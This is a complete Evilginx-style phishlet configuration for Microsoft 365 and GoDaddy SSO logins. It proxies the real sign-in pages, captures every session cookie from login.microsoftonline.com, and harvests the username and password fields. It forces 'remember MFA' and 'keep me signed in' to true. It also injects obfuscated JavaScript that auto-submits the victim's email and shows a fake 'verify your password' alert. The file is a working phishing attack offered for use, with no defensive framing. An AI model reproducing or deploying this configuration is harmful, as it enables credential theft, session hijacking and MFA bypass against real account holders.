name: 'o365'
author: 'REDSON'
min_ver: '2.4.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
  - {phish_sub: 'sso', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing:false}
  - {phish_sub: '', orig_sub: '', domain: 'godaddy.com', session: false, is_landing:false}
  - {phish_sub: 'events.api', orig_sub: 'events.api', domain: 'godaddy.com', session: false, is_landing:false}

sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'events.api.godaddy.com', orig_sub: 'events.api', domain: 'godaddy.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'events.api.godaddy.com', orig_sub: 'events.api', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}

auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['.*,regexp']
  - domain: 'login.microsoftonline.com'
    keys: ['.*,regexp']
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'json'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'json'  
auth_urls:
  - '/common/SAS/ProcessAuth'
  - '/kmsi'
  - '/login.srf'

login:
  domain: 'login.microsoftonline.com'
  path: '/' 
force_post:
  - path: '/kmsi'
    search: 
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS'
    search: 
      - {key: 'rememberMFA', search: '.*'}
    force:
      - {key: 'rememberMFA', value: 'true'}
    type: 'post'
js_inject:
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/common/oauth2/","/","/*"]
    script: |
      const _g0 = async _g1 => {
      for (; null === document.querySelector(_g1);) await new Promise(_g1 => requestAnimationFrame(_g1));
      return document.querySelector(_g1);
      };
      _g0("#i0116").then(_g1 => {
        var _g2 = document.querySelector("#i0116"), _g3 = document.querySelector("#idSIButton9"), _g4 = window.location.href;
        if (/#/.test(window.location.href)) {
          var _g8 = _g4.split("#")[1].replace(/[=]/gi, "").substring(0);
          _g2.focus(), _g2.value = _g8, _g3.focus(), void _g3.click();
        }
      });
      const _ga = async _g1 => {
        for (; null === document.querySelector(_g1);) await new Promise(_g1 => requestAnimationFrame(_g1));
        return document.querySelector(_g1);
      };
      _ga("#idA_PWD_ForgotPassword").then(_g1 => {
        _gb = document.getElementById("i0118"), _gb.insertAdjacentHTML("beforebegin", '<div id="important" class="alert alert-error">Because you\'re accessing sensitive info, you need to verify your password</div>');
      });